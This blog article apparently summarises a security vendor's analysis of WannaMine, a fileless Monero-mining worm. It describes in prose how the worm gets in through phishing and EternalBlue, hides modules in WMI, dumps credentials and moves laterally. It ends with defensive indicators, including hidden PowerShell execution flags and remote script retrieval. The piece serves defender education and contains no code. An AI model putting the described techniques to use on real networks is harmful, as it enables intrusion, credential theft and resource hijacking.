How WannaMine Works: The Fileless Cryptominer Worm That Turns Windows Admin Tools Into a Mining Rig

By Ash K
How WannaMine Works: The Fileless Cryptominer Worm That Turns Windows Admin Tools Into a Mining Rig

WannaMine is not the loud, crash-your-system kind of malware that immediately gives itself away. Instead, it operates quietly, efficiently, and almost invisibly, turning compromised Windows systems into cryptocurrency mining engines without leaving the usual forensic trail behind. Its defining trait is that it rarely writes anything to disk.

Rather than relying on dropped executables, WannaMine abuses tools that already exist on most Windows machines. PowerShell, Windows Management Instrumentation, and built-in administrative capabilities become its execution environment. This “living-off-the-land” approach allows it to blend into legitimate system activity while steadily draining CPU resources to mine Monero.

Why WannaMine is considered fileless

Most malware leaves footprints. Files, registry keys, scheduled tasks, or startup entries usually give defenders something concrete to hunt for. WannaMine avoids that model almost entirely.

The malware stores its core components inside the WMI repository and executes them directly from memory. Persistence is achieved through WMI event subscriptions rather than startup files or services. From a defender’s perspective, that shifts detection away from traditional file-based indicators and toward behavioral signals that are far easier to miss.

Initial access: simple lures and old vulnerabilities

The infection chain often begins in one of two ways. The first is depressingly familiar: a phishing email carrying a malicious batch file disguised as something routine. Once opened, it quietly launches PowerShell and pulls the next stage into memory.

The second path targets environments that have not patched critical SMB flaws. WannaMine is capable of exploiting EternalBlue (MS17-010), allowing it to compromise exposed systems directly over the network. This makes it particularly dangerous in flat networks where legacy servers still exist.

After gaining execution, the malware checks whether the operating system is 32-bit or 64-bit and retrieves the appropriate PowerShell payload. From this point on, almost everything happens in memory.

A modular design hidden inside WMI

WannaMine behaves less like a single script and more like a toolkit. Its components are divided into modules, each responsible for a specific task such as credential harvesting, lateral movement, or mining.

These modules are stored as properties inside custom WMI classes with names that resemble legitimate system or application components. When needed, the malware reads those properties, reconstructs the code, and executes it on demand. This design allows the attacker to reuse the same framework for multiple operations without constantly re-downloading payloads.

Persistence without startup entries

Persistence is handled through WMI event consumers rather than registry keys or scheduled tasks. The malware sets up event triggers that execute PowerShell whenever certain system conditions are met, such as service activity or system events.

Because WMI is commonly used by administrators and management tools, this persistence mechanism can remain unnoticed for long periods, especially in environments where WMI auditing is minimal or nonexistent.

Credential theft as a force multiplier

Once established on a host, WannaMine attempts to escalate its reach. It loads a PowerShell-based credential dumping module into memory and extracts NTLM hashes or, in some cases, clear-text credentials.

If high-privilege credentials are recovered, the malware shifts strategy. Rather than relying on noisy exploits, it begins using legitimate remote execution techniques to move laterally. This makes its activity appear far more like normal administrative behavior than a worm spreading aggressively.

Lateral movement across the network

With valid credentials, WannaMine uses WMI-based remote execution to launch commands on other systems discovered within the network. This method allows it to spread quickly without dropping files or triggering exploit-based alerts.

When credentials are not available, the malware does not stall. It falls back to exploiting EternalBlue against vulnerable machines, ensuring it can still propagate in poorly patched environments. This dual-path approach makes WannaMine resilient across a wide range of enterprise networks.

Network discovery and target selection

Rather than blindly scanning, WannaMine incorporates logic derived from enterprise assessment tooling to identify reachable systems and viable attack paths. It maps the network, identifies systems that expose SMB, and prioritizes targets that maximize spread.

This is one of the reasons infections can escalate quickly. The malware does not just spread, it spreads intelligently.

Cryptomining and system abuse

Once mining begins, the malware configures the system to stay awake indefinitely, preventing sleep or standby modes that would interrupt mining activity. CPU usage is driven high, often to the point where servers and workstations become sluggish or unusable.

WannaMine also eliminates competition. It scans for processes associated with common mining ports and terminates them, ensuring that its own miner monopolizes system resources. Its mining traffic is pushed through a dedicated port that differs from those used by many off-the-shelf miners.

Why WannaMine still matters today

Although WannaMine is not a brand-new threat, its techniques remain highly relevant. Fileless execution, abuse of legitimate administration tools, and credential-based lateral movement are all tactics still favored by modern attackers.

The malware is a reminder that patching, credential hygiene, and visibility into PowerShell and WMI activity are not optional. As long as enterprise environments trust these tools implicitly, threats like WannaMine will continue to find room to operate.

Indicators of Compromise

  • Hidden PowerShell execution using flags such as -NoP -NonI -W Hidden
  • Outbound PowerShell script retrieval from unfamiliar external IP addresses
  • Unusual WMI event filters, consumers, or bindings not created by known management tools
  • Custom WMI classes resembling legitimate services but containing encoded scripts
  • Use of WMI-based remote execution across multiple internal hosts
  • Unexpected high CPU usage combined with outbound mining-related network traffic
  • SMB scanning or exploitation activity originating from internal systems
  • Termination of processes associated with common cryptomining ports

Source credit: Technical analysis derived from “How WannaMine Works: A Fileless Cryptominer Malware,” published by Picus Security.

Ash K
Ash K
Ashton is a seasoned Cybersecurity Professional with over 25 years of experience in Cybersecurity Research, Cybersecurity Incident response, Products and Security Solutions architecture.